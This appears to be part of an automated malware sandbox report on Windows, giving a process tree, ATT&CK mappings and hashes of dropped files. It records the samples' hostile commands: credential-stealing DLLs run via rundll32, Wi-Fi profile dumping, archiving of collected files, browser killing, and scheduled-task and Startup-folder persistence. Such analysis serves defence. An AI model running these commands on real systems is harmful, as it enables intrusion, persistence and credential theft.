        findstr /V "posted" Good
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1996
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:648
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
        6⤵
        
        PID:776
      - C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
        
        Seat.com m
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:580
        
        C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
        7⤵
        
        PID:2108
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:380
  - - C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe
      "C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      PID:1908
    - - C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
        5⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1428
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\6c7109f0f87b7e\cred64.dll, Main
        6⤵
        
        PID:1764
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\6c7109f0f87b7e\cred64.dll, Main
        7⤵
        
        PID:916
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        8⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\290804112282_Desktop.zip' -CompressionLevel Optimal
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1592
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\6c7109f0f87b7e\clip64.dll, Main
        6⤵
        
        PID:1064
  - - C:\Users\Admin\AppData\Local\Temp\10142340101\CgmaT61.exe
      "C:\Users\Admin\AppData\Local\Temp\10142340101\CgmaT61.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:2204
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 1196
        5⤵
        Program crash
        
        PID:2384
  - - C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe
      "C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"
      4⤵
      PID:2224
    - - C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"
        5⤵
        
        PID:1540
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 500
        5⤵
        Program crash
        
        PID:2340
  - - C:\Users\Admin\AppData\Local\Temp\10142360101\9e00f4e6d2.exe
      "C:\Users\Admin\AppData\Local\Temp\10142360101\9e00f4e6d2.exe"
      4⤵
      PID:2788
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 1204
        5⤵
        Program crash
        
        PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\10142370101\3bde0d890a.exe
      "C:\Users\Admin\AppData\Local\Temp\10142370101\3bde0d890a.exe"
      4⤵
      PID:2432
  - - C:\Users\Admin\AppData\Local\Temp\10142380101\5992c9bee2.exe
      "C:\Users\Admin\AppData\Local\Temp\10142380101\5992c9bee2.exe"
      4⤵
      PID:1908
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        Kills process with taskkill
        
        PID:2140
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        Kills process with taskkill
        
        PID:828
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        Kills process with taskkill
        
        PID:1824
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        Kills process with taskkill
        
        PID:1776
  - - C:\Users\Admin\AppData\Local\Temp\10142390101\1c772cd67c.exe
      "C:\Users\Admin\AppData\Local\Temp\10142390101\1c772cd67c.exe"
      4⤵
      PID:1564
  - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
      "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
      4⤵
      PID:668
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2512
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:940
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2892
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2852
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2904
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2464
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:1744
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:936
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2132
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2244
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2384
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2808
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2316
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2436
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:1736
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2832
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:1764
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2276
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:2312
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3084
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3120
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3136
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3160
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3176
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3272
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3344
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3352
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3400
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3420
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3436
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3452
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3496
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3536
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3552
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3572
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3636
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:3900
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4012
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4032
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4040
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4064
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:1088
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4152
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4268
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4336
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4384
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4400
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4516
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4536
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4708
    - - C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
        5⤵
        
        PID:4772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
  2⤵
  - System Location Discovery: System Language Discovery
  PID:584
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:720
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1808
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2788
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:1952

C:\Windows\system32\taskeng.exe
taskeng.exe {D0A6281A-3AE0-40F3-B9FF-879F255A06EB} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
1⤵
PID:2652
- C:\ProgramData\WMIsys\CONAtdrive.exe
  C:\ProgramData\WMIsys\CONAtdrive.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1592
- C:\ProgramData\WMIsys\CONAtdrive.exe
  C:\ProgramData\WMIsys\CONAtdrive.exe
  2⤵
  PID:540

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3512.0.541798048\743951645" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff3efc9e-eda7-42de-8e67-2653a3e49c6c} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" 1352 10ed5b58 gpu
1⤵
PID:3156

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3512.2.1739917387\2102514774" -childID 1 -isForBrowser -prefsHandle 1988 -prefMapHandle 1984 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 732 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab55db38-8595-49cc-94aa-038ea2f84194} 3512 "\\.\pipe\gecko-crash-server-pipe.3512" 2000 10e61458 tab
1⤵
PID:4324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Temp\csRjPbWZA.hta

Filesize
779B

MD5
39c8cd50176057af3728802964f92d49

SHA1
68fc10a10997d7ad00142fc0de393fe3500c8017

SHA256
f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

SHA512
cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
71KB

MD5
83142242e97b8953c386f988aa694e4a

SHA1
833ed12fc15b356136dcdd27c61a50f59c5c7d50

SHA256
d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

SHA512
bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EB0KZ1Y4\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\soft[1]

Filesize
987KB

MD5
f49d1aaae28b92052e997480c504aa3b

SHA1
a422f6403847405cee6068f3394bb151d8591fb5

SHA256
81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

SHA512
41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

Download Submit
C:\Users\Admin\AppData\Local\Temp34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE

Filesize
1.8MB

MD5
9696715fff90cdf3d413a595dd497186

SHA1
5c0b189510f9fe56508e7986f80a2dcb4d3506f8

SHA256
9d42d85d1e51edb7b763f62d976ffcee159f792942336b217a4adf798a5ad3f7

SHA512
5dbba90afa86e79bd6713eb494d76c1ddf328e993aa754514c162f6d7f45921648f10b323a9adad31f0d54672dcd5b25947ef3447ac58bde5a862398b56e2e62

Download Submit
C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe

Filesize
1.3MB

MD5
81791c3bf6c8d01341e77960eafc2636

SHA1
3a9e164448717ced3d66354f17d3bcba9689c297

SHA256
c1bfa0e9313ea896eba6329eb52b70374df276493468ca30d633f825f91f52a0

SHA512
0629a854e68e3742448447d732a6eb21bcf47dd451552f9699d227fed2733c54a508e4fbfd647c11bee2b5f031bbda0e9f16b5af84c800598a1fe72368aa2f47

Download Submit
C:\Users\Admin\AppData\Local\Temp\10141700101\cfa5113e1e.exe

Filesize
938KB

MD5
fd8d04f1b1961ea46b8fbe930c425bef

SHA1
48808c4fd0b94245cc8d85ba0fe5f144310c553d

SHA256
76a7998e4124e9539d35151c83d0f5a76d51182a922a25360780339d95ca0d94

SHA512
824f6400400d3571cc1519c722f538d41daf57edf70626431fc68e622749a3b8ffb9f0ec31b189b9b04640d9a5bc40f06b4ccf011c61b844011604d95f2b1669

Download Submit
C:\Users\Admin\AppData\Local\Temp\10141710121\am_no.cmd

Filesize
1KB

MD5
cedac8d9ac1fbd8d4cfc76ebe20d37f9

SHA1
b0db8b540841091f32a91fd8b7abcd81d9632802

SHA256
5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

SHA512
ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe

Filesize
262KB

MD5
36105cc7aff011ef834f9e83717f9ab1

SHA1
9b5a1a9da2f1e22ae23517c45b82c734a5793ded

SHA256
36263b9d2418efa92ba637974cfed268437354d88be78814354c5d47337890c2

SHA512
38662724ed70d768ff19ed260f17593a956858ee5aedd4d4178f895bf3ca39181983d8310acc6aa203223518fa7394e64829832b380121a86360120aab66ba50

Download Submit
C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe

Filesize
1.7MB

MD5
c70ba9b3fc03b137ac57e9f9eb7f669b

SHA1
188d35cc8f3e888aacd4a03aaac5979fa7680b01

SHA256
d7c6199beb7718942d7fa14f3bebdae21a1142d7ccdbf4486f79c04228a873b7

SHA512
30efb384601044f0de192d3ae6de6d90e2dc6d260cabaf35ad27c74d3181ddf3de7e47d0c0778cbc7ec00a5fabdd2a804889357353511fe6c8200267f2a3e585

Download Submit
C:\Users\Admin\AppData\Local\Temp\10142200101\daaa9cab9e.exe

Filesize
3.8MB

MD5
c9e0574f5278149157f8cd14ad266886

SHA1
3b1671a65d6ed7beda7001eaf7b239bf153012cd

SHA256
98ffb7534eb707b6d086ff3c049a424d19256056c43e09945097dae5538a7eb9

SHA512
ec409f1f3b4484574697877c56253e19f2f0c189b8ba0a1cd3e64e1dedc7876cf3a604f0d2496bedfaf20ca1c115055431cd6f7e443189b4ff2a1fb67f32289a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10142210101\54ac06cb5b.exe

Filesize
1.8MB

MD5
3a684b497af86498fe2f8dc4c392cc51

SHA1
ad86b1d97c75406c52864b02eb981e6511ac835e

SHA256
f832a90b90aed49ea52fabccce43ef1db001f732a01705346503581a6dd68dd8

SHA512
ca4a6558fc0e8996beaaabd809b2978c4f26148adf796031948fc472ac7c49d755c331d5698b0037832fc132e8d620a926a1c20631d2d47af610904bf7f3290c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10142220101\e2ba769276.exe

Filesize
4.5MB

MD5
16bcdf9f515993aa3f2e6e33fd867768

SHA1
750d69459a107b7fc45a2073895a51f0d211415d

SHA256
873565936ff2ecf66e4efc7c211f555589deea3b94474e65fc5c9ca712a61d3e

SHA512
9bca85e004363ac6a554c1120e02f82f4af4cc8c439a40166883eb0c290d636087a3f31200d25bfaff14351e9d0593d7f7d9725f82d7037e4ca47f920347b430

Download Submit
C:\Users\Admin\AppData\Local\Temp\10142230101\f8ea4e4a49.exe

Filesize
364KB

MD5
9dd7f35baa732ab9c19737f7574f5198

SHA1
af2f9db558e5c979839af7fc54a9c6f4c5f1945c

SHA256
ebf04432efd04f6cef2c51164bb25c78867f0c8f7e361653408f74e7b5e1f2f6

SHA512
ee2d9b78696a6fcbb018ea46a8125edea4d3df76c604290d8ecc6586e9dbf15e8d14e09fdcb124fc235d47d1736e9995ec7501d101541a091b3d208efa695e91

Download Submit
C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe

Filesize
159KB

MD5
36beea554789233179f8275b85035d42

SHA1
f4bd79044a32adb1b678aaec13eda99d9f169215

SHA256
df5311f9bb283913fd5295202df47050893b8ed4f29b1801e1720f5443e87163

SHA512
f8868aa5609787a5222d393848ee8fdb2551691470c6f0e0f30242660c048f6ed7306aa4c46c6b0f359800b422c056fbb1f66fe750effd3a7c47fff7394de49d

Download Submit
C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe

Filesize
2.0MB

MD5
a62fe491673f0de54e959defbfebd0dd

SHA1
f13d65052656ed323b8b2fca8d90131f564b44dd

SHA256
936d17e301a6f5b6878b1a6f46a215d5af02d8254c65dc64a8679f7b2ff25213

SHA512
4d0ab58f4cd009a48b0bfccc4a3b2163e596db17c5fed2f88b969b752e0704234130377ad7c5488b406a21b51560ec6017609e3f5063771d00a610c2db6f9129

Download Submit
C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe

Filesize
3.5MB

MD5
45c1abfb717e3ef5223be0bfc51df2de

SHA1
4c074ea54a1749bf1e387f611dea0d940deea803

SHA256
b01d928331e2b87a961b1a5953bc7dbb8d757c250f1343d731e3b6bb20591243

SHA512
3d667f5ada9b62706be003ba42c4390177fc47c82d1d9fa9eaca36e36422e77b894f5ec92ad7a143b7494a5a4b43d6eb8af91cb54e78984bb6e8350df5c34546

Download Submit
C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe

Filesize
429KB

MD5
d8a7d8e3ffe307714099d74e7ccaac01

SHA1
b0bd0dc5af33f9ee7f3cad3b3b1f3057d706ad77

SHA256
c5b5c385184b5c2d7ed666beb38bb10b703097573f7a6b42b7fdef78acf99c96

SHA512
f46755b7f31d0676f68a97912d031b8354d500ddaed5f60eb10929d861730b5b2d4ba3f67a3141c10d4706c018f58eb42e34e33f70fa90efcabee2ef2cd54631

Download Submit
